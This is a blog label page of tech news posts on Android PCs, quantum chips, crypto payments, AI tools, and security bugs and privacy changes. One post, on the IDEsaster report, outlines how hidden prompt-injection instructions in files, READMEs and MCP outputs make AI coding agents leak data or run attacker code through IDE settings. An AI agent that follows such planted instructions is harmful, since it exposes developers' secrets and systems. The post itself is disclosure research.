Search This Blog

Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Showing posts with label Technology. Show all posts

Google Plans to Bring Android to PCs With Aluminium - Key Details Here

 


Google isn’t exactly known for secrecy anymore. Unlike Apple, the company frequently reveals features early, allows products to leak, and even publishes official teasers ahead of major launches. Pixel devices, in particular, are often shown off well before press events, making it clear that Google prefers to guide the narrative rather than fight speculation. For most fans, excitement now comes from following Google’s roadmap rather than waiting for surprises.

There are still exceptions — especially when billions of dollars and the future of computing are involved. One of Google’s most ambitious and closely watched projects is its plan to merge Android and ChromeOS into a single operating system built for PCs. The move has the potential to reshape Chromebooks, redefine Android’s role beyond phones, and place Google in more direct competition with Apple, Microsoft, and the iPad.

ChromeOS, despite its success in education and enterprise environments, has never managed to break into the mainstream laptop market. While Chromebooks are affordable, they have long been criticized for limited offline functionality and a lack of flexibility compared to Windows and macOS. Even after gaining the ability to run Android apps, ChromeOS remained a niche platform, struggling to compete with more powerful and versatile alternatives. Over time, it became increasingly clear that Google’s enthusiasm for ChromeOS as a standalone operating system was fading.

Rumors about a unification of Android and ChromeOS began circulating about a year ago. Google confirmed the plan in July 2025 during a conversation with TechRadar and later made it official at Qualcomm’s Snapdragon Summit in September. At the event, Google announced a partnership with Qualcomm to develop a platform that blends mobile and desktop computing, with artificial intelligence at its core. Google’s Senior VP of Devices and Services, Rick Osterloh, made the company’s intentions unmistakable, stating that the two companies were "building together a common technical foundation for our products on PCs and desktop computing systems."

Further insight emerged when a now-removed Google job listing, discovered by Android Authority, revealed the internal codename “Aluminium.” The company was hiring a “Senior Product Manager, Android, Laptop and Tablets,” pointing to a unified vision across form factors. The British spelling of Aluminium is likely a nod to Chromium, the open-source project that underpins ChromeOS and the Chrome browser. Internally, the platform is sometimes abbreviated as “ALOS.”

The listing referenced a wide range of devices — including laptops, tablets, detachables, and even set-top boxes — across multiple tiers, from entry-level products to premium hardware. This suggests Google wants to move beyond the budget-focused Chromebook image and position its next operating system across a much broader spectrum of devices. While premium Chromebooks already exist, they’ve never gained significant traction, something Google appears determined to change.

Notably, the job description also mentioned transitioning “from ChromeOS to Aluminium with business continuity in the future.” This implies that ChromeOS may eventually be phased out, but not abruptly. Google seems aware that many schools and businesses rely on large Chromebook deployments and will need long-term support rather than a forced migration.

What remains unclear is how this transition will affect current Chromebook owners. The name “Aluminium” is almost certainly temporary, and Google is unlikely to ship the final product under that label. According to Android Authority, engineers have reportedly begun referring to existing software as “ChromeOS Classic” or “non-Aluminium ChromeOS.” This could mean the ChromeOS brand survives, though its underlying technology may change dramatically. Another possibility is branding the platform as “Android Desktop,” though that risks confusion with Android 16’s Desktop Mode.

There is some indication that certain existing Chromebooks may be able to upgrade. Aluminium is reportedly being tested on relatively modest hardware, including MediaTek Kompanio 520 chips and 12th-generation Intel Alder Lake processors. That said, devices would still need to meet specific RAM and storage requirements.

Artificial intelligence could ultimately be the deciding factor. Google has confirmed that Gemini will play a central role in Aluminium, and older processors may struggle to support its full capabilities. While Google has previously brought limited AI features to older hardware like Nest speakers, advanced on-device AI processing — particularly tasks involving local files or graphics rendering — may require newer chips designed specifically for AI acceleration.

Beyond hardware compatibility, a larger question looms: how serious is Google about competing in the PC market? Android is already far more widespread than ChromeOS, but convincing users that it can replace a Windows or macOS computer will be a major challenge. Google has historically struggled to get developers to build high-quality tablet apps for Android, let alone desktop-class software that rivals professional Windows applications. Users expecting to run demanding programs or high-end games may find the platform limiting, at least initially.

Some reports suggest that Google’s true target isn’t Windows or macOS, but Apple’s iPad. The iPad dominates more than half of the global tablet market, according to Statcounter, and Apple has steadily pushed its tablets closer to laptop territory. The iPad Air and Pro now use the same M-series chips found in MacBooks, while iPadOS 26 introduces more advanced multitasking and window management.

Crucially, iPads already have a mature ecosystem of high-quality apps, making them a staple in schools and businesses — the very markets Chromebooks once dominated. If Google can deliver an Android-based platform that matches the iPad’s capabilities while undercutting Apple on price, it could finally achieve the mainstream breakthrough it has long pursued.

As for timing, Google has officially set a 2026 launch window. While an early reveal is possible, the significance of the project suggests it will debut at a major event, such as Google I/O in May or a high-profile Pixel launch later in the year. The software is almost certain to align with Android 17, which is expected to enter beta by May and reach completion by fall. If schedules hold, the first Android-powered PCs could arrive in time for the 2026 holiday season, though delays could push hardware launches into 2027

Google Partners With UK to Open Access to Willow Quantum Chip for Researchers

 

Google has revealed plans to collaborate with the UK government to allow researchers to explore potential applications of its advanced quantum processor, Willow. The initiative aims to invite scientists to propose innovative ways to use the cutting-edge chip, marking another step in the global race to build powerful quantum computers.

Quantum computing is widely regarded as a breakthrough frontier in technology, with the potential to solve complex problems that are far beyond the reach of today’s classical computers. Experts believe it could transform fields such as chemistry, medicine, and materials science.

Professor Paul Stevenson of the University of Surrey, who was not involved in the agreement, described the move as a major boost for the UK’s research community. He told the BBC it was "great news for UK researchers". The partnership between Google and the UK’s National Quantum Computing Centre (NQCC) will expand access to advanced quantum hardware for academics across the country.

"The new ability to access Google's Willow processor, through open competition, puts UK researchers in an enviable position," said Prof Stevenson.
"It is good news for Google, too, who will benefit from the skills of UK academics."

Unlike conventional computers found in smartphones and laptops, quantum machines operate on principles rooted in particle physics, allowing them to process information in entirely different ways. However, despite years of progress, most existing quantum systems remain experimental, with limited real-world use cases.

By opening Willow to UK researchers, the collaboration aims to help "uncover new real world applications". Scientists will be invited to submit detailed proposals outlining how they plan to use the chip, working closely with experts from both Google and the NQCC to design and run experiments.

Growing competition in quantum computing

When Google introduced the Willow chip in 2024, it was widely viewed as a significant milestone for the sector. The company is not alone in the race, with rivals such as Amazon and IBM also developing their own quantum technologies.

The UK already plays a key role in the global quantum ecosystem. Quantinuum, a company headquartered in Cambridge and Colorado, reached a valuation of $10 billion (£7.45 billion) in September, underlining investor confidence in the sector.

A series of breakthroughs announced throughout 2025 has led many experts to predict that quantum computers capable of delivering meaningful real-world impact could emerge within the next ten years.

Dr Michael Cuthbert, Director at the National Quantum Computing Centre, said the partnership would "accelerate discovery". He added that the advanced research it enables could eventually see quantum computing applied to areas such as "life science, materials, chemistry, and fundamental physics".

The NQCC already hosts seven quantum computers developed by UK-based companies including Quantum Motion, ORCA, and Oxford Ionics.

The UK government has committed £670 million to support quantum technologies, identifying the field as a priority within its Industrial Strategy. Officials estimate that quantum computing could add £11 billion to the UK economy by 2045.

Lugano: Swiss Crypto Hub Where Bitcoin Pays for Everything

 

The Swiss city of Lugano, located in the Italian-speaking canton of Ticino, has turned itself into the European capital for cryptocurrency through its bold “Plan ₿” scheme, which lets citizens and businesses transact in Bitcoin and Tether for almost everything. The joint city of Lugano and Tether program is to build blockchain technology as the core of its financial infrastructure, the first major European city to scale to such a level with crypto payments. 

Widespread merchant adoption

More than 350 businesses in Lugano now accept Bitcoin, from shops to cafes, restaurants and yes, even luxury retailers. From coffee and burgers to designer bags, residents can buy it all with cryptocurrency — and still have the option to pay in Swiss francs. Entrepreneurs have adopted the system in large part because of cost – with transaction fees far lower for Bitcoin (less than 1 percent) than for credit cards (between 1.7 and 3.4 percent). 

Acceptance of cryptocurrency has now been expanded by the city council from retail exchanges to all city payments and services. Residents and business can now use a fully-automated system with the help of Bitcoin Suisse to pay taxes, attend preschool, or settle any other city-related bill in Bitcoin or Tether. Since the payment process is based on Swiss QR-Bill, users just scan the QR codes on the bills and pay them via mobile wallets. 

Technical infrastructure 

Bitcoin Suisse, the technical infrastructure provider, processes payments and manages integration with current municipal systems. The crypto payment option is alongside more traditional options such as bank transfer and payments at post office counters, so everyone’s needs are accommodated.

The Deputy Chief Financial Officer Paolo Bortolin said Lugano is “pioneers” at the municipality level in providing the unlimited acceptance of Bitcoin and Tether without requiring the manual generation of special crypto-friendly invoices. Plan B encompasses more than just payment infrastructure, including educational initiatives like the Plan ₿ Summer School in collaboration with local universities and an annual Plan B Forum conference held each October. 

The initiative positions Lugano as Europe's premier destination for Bitcoin, blockchain, and decentralized technology innovation, with the Plan B Foundation guiding strategic development and long-term vision. City officials, including Mayor Michele Foletti and Economic Promotion Director Pietro Poretti, remain committed to scaling blockchain adoption throughout all facets of daily life in Lugano.

Adobe Brings Photo, Design, and PDF Editing Tools Directly Into ChatGPT

 



Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.

With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.

For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.

The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.

Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.

The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.

This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.

By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.

Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.




Wi-Fi Jammers Pose a Growing Threat to Home Security Systems: What Homeowners Can Do

  •  

Wi-Fi technology powers most modern home security systems, from surveillance cameras to smart alarms. While this connectivity offers convenience, it also opens the door to new risks. One such threat is the growing use of Wi-Fi jammers—compact devices that can block wireless signals and potentially disable security systems just before a break-in. By updating your security setup, you can reduce this risk and better protect your home.

Key concern homeowners should know:

  • Wi-Fi jammers can interrupt wireless security cameras and smart devices.
  • Even brief signal disruption may prevent useful footage from being recorded.

Wi-Fi jammers operate by overpowering a network with a stronger signal on the same frequency used by home security systems. Though the technology itself isn’t new, law enforcement believes it is increasingly being exploited by burglars trying to avoid identification. A report by KPRC Click2Houston described a case where a homeowner noticed their camera feed becoming distorted as thieves approached, allegedly using a backpack containing a Wi-Fi jammer. Similar incidents were later reported by NBC Los Angeles in high-end neighborhoods in California.

How criminals may use jammers:

  • Target wireless-only security setups.
  • Disable cameras before entering a property.
  • Avoid being captured on surveillance footage.

Despite these risks, Wi-Fi jammers are illegal in the Unite States under the Communications Act of 1934. Federal agencies including the Department of Justice, Homeland Security, and the Federal Communications Commission actively investigate and prosecute those who sell or use them. Some states, such as Indiana and Oregon, have strengthened laws to improve enforcement. Still, the devices remain accessible, making awareness and prevention essential.

Legal status at a glance:

  • Wi-Fi jammers are banned nationwide.
  • Selling or operating them can lead to serious penalties.
  • Enforcement varies by state, but possession is still illegal.

While it’s unclear how often burglars rely on this method, smart home devices remain vulnerable to signal interference. According to CNET, encryption protects data but does not stop jamming. They also note that casual use by criminals is uncommon due to the technical knowledge required. However, real-world cases in California and Texas highlight why extra safeguards matter.

Ways to protect your home:

  • Choose wired security systems that don’t rely on Wi-Fi.
  • Upgrade to dual-band routers using both 2.4 GHz and 5 GHz.
  • Opt for security systems with advanced encryption.
  • Regularly review and update your home security setup.

Taking proactive steps to safeguard your security cameras and smart devices can make a meaningful difference. Even a short disruption in surveillance may determine whether authorities can identify a suspect, making prevention just as important as detection.

AI Avatars Trialled to Ease UK Teacher Crisis

 

In the UK, where teacher recruitment and retention is becoming increasingly dire, schools have started experimenting with new and controversial technology – including AI-generated “deepfake” avatars and remote teaching staff. Local media outlets are tracking these as answers to the mass understaffing and overwork in the education sector and delving into the ethics and practicalities. 

Emergence of the deepfake teacher

One of the most radical experiments underway is the use of AI to construct realistic digital avatars of real-life teachers. At the Great Schools Trust, for example, staff are trialling technology that creates video clones of themselves to teach . These "deepfake" teachers are mainly intended to help students state up on the curriculum if they have missed class for whatever reason. By deploying these avatars, schools hope they can provide students with reliable, high-quality instruction without further taxing the physical teacher’s time. 

Advocates including Mr. Ierston maintain the technology is not replacing human teachers but freeing them from monotonous work. The vision is that AI can take over the administrative tasks and the routine delivery, with human teachers concentrating on delivering personalised support and managing the classroom. In addition to catch-up lessons, the technology also has translation features, so schools can speak to parents in dozens of different languages, instantly. 

Alongside AI avatars, schools are turning increasingly to remote teaching models to fill holes in core subjects such as math. The report draws attention to a Lancashire secondary school which has appointed a maths teacher who is now living thousands of miles away. This now-remote staffer teaches a class of students from a classroom via live video link, a strategy forced by necessity in communities where finding qualified teachers is a pipe dream. 

Human cost of high-tech solutions 

Despite the potential efficiency gains, the shift has sparked significant scepticism from unions and educators. Critics argue that teaching is fundamentally an interpersonal profession that relies on human connection, empathy, and the ability to read a room—qualities that a screen or an avatar cannot replicate. 

There are widespread concerns that such measures could de-professionalize the sector and serve as a "sticking plaster" rather than addressing the root causes of the recruitment crisis, such as pay and working conditions. While the government and tech advocates view these tools as a way to "level the playing field" and reduce workload, many in the profession remain wary of a future where the teacher at the front of the room might not be there at all.

AI in Cybercrime: What’s Real, What’s Exaggerated, and What Actually Matters

 



Artificial intelligence is increasingly influencing the cyber security infrastructure, but recent claims about “AI-powered” cybercrime often exaggerate how advanced these threats currently are. While AI is changing how both defenders and attackers operate, evidence does not support the idea that cybercriminals are already running fully autonomous, self-directed AI attacks at scale.

For several years, AI has played a defining role in cyber security as organisations modernise their systems. Machine learning tools now assist with threat detection, log analysis, and response automation. At the same time, attackers are exploring how these technologies might support their activities. However, the capabilities of today’s AI tools are frequently overstated, creating a disconnect between public claims and operational reality.

Recent attention has been driven by two high-profile reports. One study suggested that artificial intelligence is involved in most ransomware incidents, a conclusion that was later challenged by multiple researchers due to methodological concerns. The report was subsequently withdrawn, reinforcing the importance of careful validation. Another claim emerged when an AI company reported that its model had been misused by state-linked actors to assist in an espionage operation targeting multiple organisations.

According to the company’s account, the AI tool supported tasks such as identifying system weaknesses and assisting with movement across networks. However, experts questioned these conclusions due to the absence of technical indicators and the use of common open-source tools that are already widely monitored. Several analysts described the activity as advanced automation rather than genuine artificial intelligence making independent decisions.

There are documented cases of attackers experimenting with AI in limited ways. Some ransomware has reportedly used local language models to generate scripts, and certain threat groups appear to rely on generative tools during development. These examples demonstrate experimentation, not a widespread shift in how cybercrime is conducted.

Well-established ransomware groups already operate mature development pipelines and rely heavily on experienced human operators. AI tools may help refine existing code, speed up reconnaissance, or improve phishing messages, but they are not replacing human planning or expertise. Malware generated directly by AI systems is often untested, unreliable, and lacks the refinement gained through real-world deployment.

Even in reported cases of AI misuse, limitations remain clear. Some models have been shown to fabricate progress or generate incorrect technical details, making continuous human supervision necessary. This undermines the idea of fully independent AI-driven attacks.

There are also operational risks for attackers. Campaigns that depend on commercial AI platforms can fail instantly if access is restricted. Open-source alternatives reduce this risk but require more resources and technical skill while offering weaker performance.

The UK’s National Cyber Security Centre has acknowledged that AI will accelerate certain attack techniques, particularly vulnerability research. However, fully autonomous cyberattacks remain speculative.

The real challenge is avoiding distraction. AI will influence cyber threats, but not in the dramatic way some headlines suggest. Security efforts should prioritise evidence-based risk, improved visibility, and responsible use of AI to strengthen defences rather than amplify fear.



Neo AI Browser: How Norton’s AI-Driven Browser Aims to Change Everyday Web Use

 


Web browsers are increasingly evolving beyond basic internet access, and artificial intelligence is becoming a central part of that shift. Neo, an AI-powered browser developed by Norton, is designed to combine browsing, productivity tools, and security features within a single platform. The browser positions itself as a solution for users seeking efficiency, privacy control, and reduced online distractions.

Unlike traditional browsers that rely heavily on cloud-based data processing, Neo stores user information directly on the device. This includes browsing history, AI interactions, and saved preferences. By keeping this data local, the browser allows users to decide what information is retained, synchronized, or removed, addressing growing concerns around data exposure and third-party access.

Security is another core component of Neo’s design. The browser integrates threat protection technologies intended to identify and block phishing attempts, malicious websites, and other common online risks. These measures aim to provide a safer browsing environment, particularly for users who frequently navigate unfamiliar or high-risk websites.

Neo’s artificial intelligence features are embedded directly into the browsing experience. Users can highlight text on a webpage to receive simplified explanations or short summaries, which may help when reading technical, lengthy, or complex content. The browser also includes writing assistance tools that offer real-time grammar corrections and clarity suggestions, supporting everyday tasks such as emails, reports, and online forms.

Beyond text-based tools, Neo includes AI-assisted document handling and image-related features. These functions are designed to support content creation and basic processing tasks without requiring additional software. By consolidating these tools within the browser, Neo aims to reduce the need to switch between multiple applications during routine work.

To improve usability, Neo features a built-in ad blocker that limits intrusive advertising. Reducing ads not only minimizes visual distractions but can also improve page loading speeds. This approach aims to provide a smoother and more focused browsing experience for both professional and casual use.

Tab management is another area where Neo applies automation. Open tabs are grouped based on content type, helping users manage multiple webpages more efficiently. The browser also remembers frequently visited sites and ongoing tasks, allowing users to resume activity without manually reorganizing their workspace.

Customization plays a role in Neo’s appeal. Users can adjust the browser’s appearance, create shortcuts, and modify settings to better match their workflow. Neo also supports integration with external applications, enabling notifications and tool access without leaving the browser interface.

Overall, Neo reflects a broader trend toward AI-assisted browsing paired with stronger privacy controls. By combining local data storage, built-in security, productivity-focused AI tools, and performance optimization features, the browser presents an alternative approach to how users interact with the web. Whether it reshapes mainstream browsing habits remains to be seen, but it underlines how AI is steadily redefining everyday digital experiences.



Circle and Aleo Roll Out USDCx With Banking-Level Privacy Features

 

Aleo and Circle are launching USDCx, a new, privacy-centric version of the USDC stablecoin designed to provide "banking-level" confidentiality while maintaining regulatory visibility and dollar backing. The token is launching first on Aleo's testnet and was built using Circle's new xReserve platform, which allows partner blockchains to issue their own USDC-backed assets that interoperate with native USDC liquidity.

New role of USDCx 

USDCx remains pegged one-to-one with the U.S. dollar, but it is issued on Aleo, a layer-1 blockchain architecture around zero-knowledge proofs for private transactions. Rather than broadcasting clear-text transaction details on-chain, Aleo represents transfers as encrypted data blobs that shield sender, receiver, and amounts from public view. 

Circle and Aleo position this as a response to institutional reluctance to use public blockchains, where transaction histories are permanently transparent and can expose sensitive commercial information or trading strategies. By putting stablecoin predictability together with privacy, they hope to make on-chain dollars more palatable to banks, enterprises, and fintech platforms. 

Despite the privacy focus, USDCx is not an absolute anonymity network. Every transaction contains a "compliance record," which can be viewed by Circle if a regulatory or law enforcement agency wants information, but not accessible on the main chain. Aleo executives claim this to be a "banking level of privacy," which is a middle-ground balance for confidentiality with regulatory support rather than utilizing absolute anonymity methods found in other private currencies.

Target use cases and strategy 

Aleo claims strong interest in inbound usage related to payroll processors, infrastructure, and foreign aid projects, and domestic national security-related application requirements for anonymous but traceable flows. Request Finance and Toku, other payroll service providers, and prediction markets are assessing USDCx to support salaries and wages without revealing income information and strategy to a public blockchain. 

USDCx on Aleo is a part of a larger strategy being undertaken by Circle that involves its xReserve infrastructure and an upcoming stablecoin-optimized Layer 1 network named "Arc," which aims to make USDC-compatible assets programmable and interoperate across different chains. Aleo, which had raised capital from investors such as a16z and Coinbase Ventures for developing zero-knowledge solutions, believes a mainnet launch for USDCx will follow the end of the current testnet period.

IDESaster Report: Severe AI Bugs Found in AI Agents Can Lead to Data Theft and Exploit


Using AI agents for data exfiltrating and RCE

A six-month research into AI-based development tools has disclosed over thirty security bugs that allow remote code execution (RCE) and data exfiltration. The findings by IDEsaster research revealed how AI agents deployed in IDEs like Visual Studio Code, Zed, JetBrains products and various commercial assistants can be tricked into leaking sensitive data or launching hacker-controlled code. 

The research reports that 100% of tested AI IDEs and coding agents were vulnerable. Impacted products include GitHub, Windsurf, Copilot, Cursor, Kiro.dev, Zed.dev, Roo Code, Junie, Cline, Gemini CLI, and Claude Code. At least twenty-four assigned CVEs and additional AWS advisories were also included. 

AI assistants exploitation 

The main problem comes from the way AI agents interact with IDE features. Autonomous components that could read, edit, and create files were never intended for these editors. Once-harmless features turned become attack surfaces when AI agents acquired these skills. In their threat model, all AI IDEs essentially disregard the base software. Since these features have been around for years, they consider them to be naturally safe. 

Attack tactic 

However, the same functionalities can be weaponized into RCE primitives and data exfiltration once autonomous AI bots are included. The research reported that this is an IDE-agnostic attack chain. 

It begins with context hacking via prompt-injection. Covert instructions can be deployed in file names, rule files, READMEs, and outputs from malicious MCP servers. When an agent reads the context, the tool can be redirected to run authorized actions that activate malicious behaviours in the core IDE. The last stage exploits built-in features to steal data or run hacker code in AI IDEs sharing core software layers.

Examples

Writing a JSON file that references a remote schema is one example. Sensitive information gathered earlier in the chain is among the parameters inserted by the agent that are leaked when the IDE automatically retrieves that schema. This behavior was seen in Zed, JetBrains IDEs, and Visual Studio Code. The outbound request was not suppressed by developer safeguards like diff previews.  

Another case study uses altered IDE settings to show complete remote code execution. An attacker can make the IDE execute arbitrary code as soon as a relevant file type is opened or created by updating an executable file that is already in the workspace and then changing configuration fields like php.validate.executablePath. Similar exposure is demonstrated by JetBrains utilities via workspace metadata.

According to the IDEsaster report, “It’s impossible to entirely prevent this vulnerability class short-term, as IDEs were not initially built following the Secure for AI principle. However, these measures can be taken to reduce risk from both a user perspective and a maintainer perspective.”


5 Critical Situations Where You Should Never Rely on ChatGPT

  •  

Just a few years after its launch, ChatGPT has evolved into a go-to digital assistant for tasks ranging from quick searches to event planning. While it undeniably offers convenience, treating it as an all-knowing authority can be risky. ChatGPT is a large language model, not an infallible source of truth, and it is prone to misinformation and fabricated responses. Understanding where its usefulness ends is crucial.

Here are five important areas where experts strongly advise turning to real people, not AI chatbots:

  • Medical advice
ChatGPT cannot be trusted with health-related decisions. It is known to provide confident yet inaccurate information, and it may even acknowledge errors only after being corrected. Even healthcare professionals experimenting with AI agree that it can offer only broad, generic insights — not tailored guidance based on individual symptoms.

Despite this, the chatbot can still respond if you ask, "Hey, what's that sharp pain in my side?", instead of urging you to seek urgent medical care. The core issue is that chatbots cannot distinguish fact from fiction. They generate responses by blending massive amounts of data, regardless of accuracy.

ChatGPT is not, and likely never will be, a licensed medical professional. While it may provide references if asked, those sources must be carefully verified. In several cases, people have reported real harm after following chatbot-generated health advice.

  • Therapy
Mental health support is essential, yet often expensive. Even so-called "cheap" online therapy platforms can cost around $65 per session, and insurance coverage remains limited. While it may be tempting to confide in a chatbot, this can be dangerous.

One major concern is ChatGPT’s tendency toward agreement and validation. In therapy, this can be harmful, as it may encourage behaviors or beliefs that are objectively damaging. Effective mental health care requires an external, trained professional who can challenge harmful thought patterns rather than reinforce them.

There is also an ongoing lawsuit alleging that ChatGPT contributed to a teen’s suicide — a claim OpenAI denies. Regardless of the legal outcome, the case highlights the risks of relying on AI for mental health support. Even advocates of AI-assisted therapy admit that its limitations are significant.

  • Advice during emergencies
In emergencies, every second counts. Whether it’s a fire, accident, or medical crisis, turning to ChatGPT for instructions is a gamble. Incorrect advice in such situations can lead to severe injury or death.

Preparation is far more reliable than last-minute AI guidance. Learning basic skills like CPR or the Heimlich maneuver, participating in fire drills, and keeping emergency equipment on hand can save lives. If possible, always call emergency services rather than relying on a chatbot. This is one scenario where AI is least dependable.

  • Password generation
Using ChatGPT to create passwords may seem harmless, but it carries serious security risks. There is a strong possibility that the chatbot could generate identical or predictable passwords for multiple users. Without precise instructions, the suggested passwords may also lack sufficient complexity.

Additionally, chatbots often struggle with basic constraints, such as character counts. More importantly, ChatGPT stores prompts and outputs to improve its systems, raising concerns about sensitive data being reused or exposed.

Instead, experts recommend dedicated password generators offered by trusted password managers or reputable online tools, which are specifically designed with security in mind.
  • Future predictions
If even leading experts struggle to predict the future accurately, it’s unrealistic to expect ChatGPT to do better. Since AI models frequently get present-day facts wrong, their long-term forecasts are even less reliable.

Using ChatGPT to decide which stocks to buy, which team will win, or which career path will be most profitable is unwise. While it can be entertaining to ask speculative questions about humanity centuries from now, such responses should be treated as curiosity-driven thought experiments — not actionable guidance.

ChatGPT can be a helpful tool when used appropriately, but knowing its limitations is essential. For critical decisions involving health, safety, security, or mental well-being, real professionals remain irreplaceable.


700+ Self-hosted Gits Impacted in a Wild Zero-day Exploit


Hackers actively exploit zero-day bug

Threat actors are abusing a zero-day bug in Gogs- a famous self-hosted Git service. The open source project hasn't fixed it yet.

About the attack 

Over 700 incidents have been impacted in these attacks. Wiz researchers described the bug as "accidental" and said the attack happened in July when they were analyzing malware on a compromised system. During the investigation, the experts "identified that the threat actor was leveraging a previously unknown flaw to compromise instances. They “responsibly disclosed this vulnerability to the maintainers."

The team informed Gogs' maintainers about the bug, who are now working on the fix. 

The flaw is known as CVE-2025-8110. It is primarily a bypass of an earlier patched flaw (CVE-2024-55947) that lets authorized users overwrite external repository files. This leads to remote code execution (RCE). 

About Gogs

Gogs is written in Go, it lets users host Git repositories on their cloud infrastructure or servers. It doesn't use GitHub or other third parties. 

Git and Gogs allow symbolic links that work as shortcuts to another file. They can also point to objects outside the repository. The Gogs API also allows file configuration outside the regular Git protocol. 

Patch update 

The previous patch didn't address such symbolic links exploit and this lets threat actors to leverage the flaw and remotely deploy malicious codes. 

While researchers haven't linked the attacks to any particular gang or person, they believe the threat actors are based in Asia.

Other incidents 

Last year, Mandiant found Chinese state-sponsored hackers abusing a critical flaw in F5 through Supershell, and selling the access to impacted UK government agencies, US defense organizations, and others.

Researchers still don't know what threat actors are doing with access to compromised incidents. "In the environments where we have visibility, the malware was removed quickly so we did not see any post-exploitation activity. We don't have visibility into other compromised servers, beyond knowing they're compromised," researchers said.

How to stay safe?

Wiz has advised users to immediately disable open-registration (if not needed) and control internet exposure by shielding self-hosted Git services via VPN. Users should be careful of new repositories with unexpected usage of the PutContents API or random 8-character names. 

For more details, readers can see the full list of indicators published by the researchers.



Meta Begins Removing Under-16 Users Ahead of Australia’s New Social Media Ban

 



Meta has started taking down accounts belonging to Australians under 16 on Instagram, Facebook and Threads, beginning a week before Australia’s new age-restriction law comes into force. The company recently alerted users it believes are between 13 and 15 that their profiles would soon be shut down, and the rollout has now begun.

Current estimates suggest that a large number of accounts will be affected, including roughly hundreds of thousands across Meta’s platforms. Since Threads operates through Instagram credentials, any underage Instagram account will also lose access to Threads.

Australia’s new policy, which becomes fully active on 10 December, prevents anyone under 16 from holding an account on major social media sites. This law is the first of its kind globally. Platforms that fail to take meaningful action can face penalties reaching up to 49.5 million Australian dollars. The responsibility to monitor and enforce this age limit rests with the companies, not parents or children.

A Meta spokesperson explained that following the new rules will require ongoing adjustments, as compliance involves several layers of technology and review. The company has argued that the government should shift age verification to app stores, where users could verify their age once when downloading an app. Meta claims this would reduce the need for children to repeatedly confirm their age across multiple platforms and may better protect privacy.

Before their accounts are removed, underage users can download and store their photos, videos and messages. Those who believe Meta has made an incorrect assessment can request a review and prove their age by submitting government identification or a short video-based verification.

The new law affects a wide list of services, including Facebook, Instagram, Snapchat, TikTok, Threads, YouTube, X, Reddit, Twitch and Kick. However, platforms designed for younger audiences or tools used primarily for education, such as YouTube Kids, Google Classroom and messaging apps like WhatsApp, are not included. Authorities have also been examining whether children are shifting to lesser-known apps, and companies behind emerging platforms like Lemon8 and Yope have already begun evaluating whether they fall under the new rules.

Government officials have stated that the goal is to reduce children’s exposure to harmful online material, which includes violent content, misogynistic messages, eating disorder promotion, suicide-related material and grooming attempts. A national study reported that the vast majority of children aged 10 to 15 use social media, with many encountering unsafe or damaging content.

Critics, however, warn that age verification tools may misidentify users, create privacy risks or fail to stop determined teenagers from using alternative accounts. Others argue that removing teens from regulated platforms might push them toward unmonitored apps, reducing online safety rather than improving it.

Australian authorities expect challenges in the early weeks of implementation but maintain that the long-term goal is to reduce risks for the youngest generation of online users.



End to End-to-end Encryption? Google Update Allows Firms to Read Employee Texts


Your organization can now read your texts

Microsoft stirred controversy when it revealed a Teams update that could tell your organization when you're not at work. Google did the same. Say goodbye to end-to-end encryption. With this new RCS and SMS Android update, your RCS and SMS texts are no longer private. 

According to Android Authority, "Google is rolling out Android RCS Archival on Pixel (and other Android) phones, allowing employers to intercept and archive RCS chats on work-managed devices. In simpler terms, your employer will now be able to read your RCS chats in Google Messages despite end-to-end encryption.”

Only for organizational devices 

This is only applicable to work-managed devices and doesn't impact personal devices. In regulated industries, it will only add RCS archiving to existing SMS archiving. In an organization, however, texting is different than emailing. In the former, employees sometimes share about their non-work life. End-to-end encryptions keep these conversations safe, but this will no longer be the case.

The end-to-end question 

There is alot of misunderstanding around end-to-end encryption. It protects messages when they are being sent, but once they are on your device, they are decrypted and no longer safe. 

According to Google, this is "a dependable, Android-supported solution for message archival, which is also backwards compatible with SMS and MMS messages as well. Employees will see a clear notification on their device whenever the archival feature is active.”

What will change?

With this update, getting a phone at work is no longer as good as it seems. Employees have always been insecure about the risks in over-sharing on email, as it is easy to spy. But not texts. 

The update will make things different. According to Google, “this new capability, available on Google Pixel and other compatible Android Enterprise devices gives your employees all the benefits of RCS — like typing indicators, read receipts, and end-to-end encryption between Android devices — while ensuring your organization meets its regulatory requirements.”

Promoting organizational surveillance 

Because of organizational surveillance, employees at times turn to shadow IT systems such as Whatsapp and Signal to communicate with colleagues. The new Google update will only make things worse. 

“Earlier,” Google said, ““employers had to block the use of RCS entirely to meet these compliance requirements; this update simply allows organizations to support modern messaging — giving employees messaging benefits like high-quality media sharing and typing indicators — while maintaining the same compliance standards that already apply to SMS messaging."

How Security Teams Can Turn AI Into a Practical Advantage

 



